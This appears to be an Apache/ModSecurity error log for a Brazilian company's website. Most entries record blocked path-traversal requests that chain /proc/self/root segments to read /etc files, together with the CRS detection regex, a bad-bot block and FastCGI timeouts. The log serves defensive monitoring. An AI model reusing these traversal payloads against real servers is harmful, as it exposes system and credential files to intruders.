[Mon Mar 16 22:19:42.915046 2026] [:error] [pid 2304:tid 140411683178240] [client 74.7.243.203:46366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abisLsh3JZxwdBQwPYGzFAAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:19:55.401831 2026] [proxy_fcgi:error] [pid 29507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55608] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:19:55.402177 2026] [log_config:warn] [pid 29507:tid 140411658000128] (32)Broken pipe: [client 179.188.53.243:55608] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:19:56.408577 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.243.203:34552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abisPAQohV2v-7oj5HG9ZQAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:20:17.777919 2026] [core:alert] [pid 2473:tid 140411565680384] [client 74.7.241.46:42460] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run
[Mon Mar 16 22:20:18.121800 2026] [proxy_fcgi:error] [pid 2325:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55844] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:20:39.126221 2026] [proxy_fcgi:error] [pid 2304:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56166] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:21:02.129815 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56434] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:21:24.077875 2026] [proxy_fcgi:error] [pid 2304:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56652] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:21:46.126619 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56816] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:22:08.121784 2026] [proxy_fcgi:error] [pid 2305:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57056] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:22:31.125961 2026] [proxy_fcgi:error] [pid 2473:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57292] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:22:53.066969 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57588] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:22:54.163421 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:34566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abis7u82sZHvlq4xgHqCgQAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:22:56.930175 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.243.203:54014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abis8O82sZHvlq4xgHqChAAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:23:15.125803 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57794] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:23:17.221566 2026] [:error] [pid 2325:tid 140411666392832] [client 74.7.241.46:55708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitBO82sZHvlq4xgHqCiwAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:19.456858 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.241.46:50860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitBwQohV2v-7oj5HG9sgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:20.939393 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.241.46:50870] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitCO82sZHvlq4xgHqCjQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:22.185583 2026] [:error] [pid 4740:tid 140411632822016] [client 74.7.241.46:50874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitCgfYLcKp6Sb5AeL1nQAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:23.838048 2026] [:error] [pid 2304:tid 140411641214720] [client 74.7.241.46:50884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitC8h3JZxwdBQwPYGzZQAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:34.779366 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.241.46:33058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitFgQohV2v-7oj5HG9vgAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:36.312337 2026] [:error] [pid 2305:tid 140411616036608] [client 74.7.241.46:33074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitGAQohV2v-7oj5HG9vwAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:37.125814 2026] [proxy_fcgi:error] [pid 2305:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57992] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:23:37.749051 2026] [:error] [pid 4740:tid 140411699963648] [client 74.7.241.46:33078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitGQfYLcKp6Sb5AeL1pgAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:40.516256 2026] [:error] [pid 4740:tid 140411691570944] [client 74.7.241.46:37642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitHAfYLcKp6Sb5AeL1qAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:40.983887 2026] [:error] [pid 2304:tid 140411666392832] [client 74.7.243.203:54030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitHMh3JZxwdBQwPYGzcAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:23:41.835210 2026] [:error] [pid 4740:tid 140411649607424] [client 74.7.241.46:37650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitHQfYLcKp6Sb5AeL1qgAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:42.339884 2026] [:error] [pid 4740:tid 140411616036608] [client 74.7.241.46:37650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitHgfYLcKp6Sb5AeL1rAAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:44.445773 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.203:55676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitIKBJNF7axNlVR0W75AAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:23:44.445970 2026] [:error] [pid 4740:tid 140411624429312] [client 74.7.241.46:37662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitHwfYLcKp6Sb5AeL1rgAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:45.749359 2026] [:error] [pid 4740:tid 140411607643904] [client 74.7.244.31:47226] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abitIQfYLcKp6Sb5AeL1rwAAAFA"]
[Mon Mar 16 22:23:46.434792 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.241.46:37666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitIu82sZHvlq4xgHqCkwAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:23:58.121810 2026] [proxy_fcgi:error] [pid 2305:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58208] AH01075: Error dispatching request to : (polling)
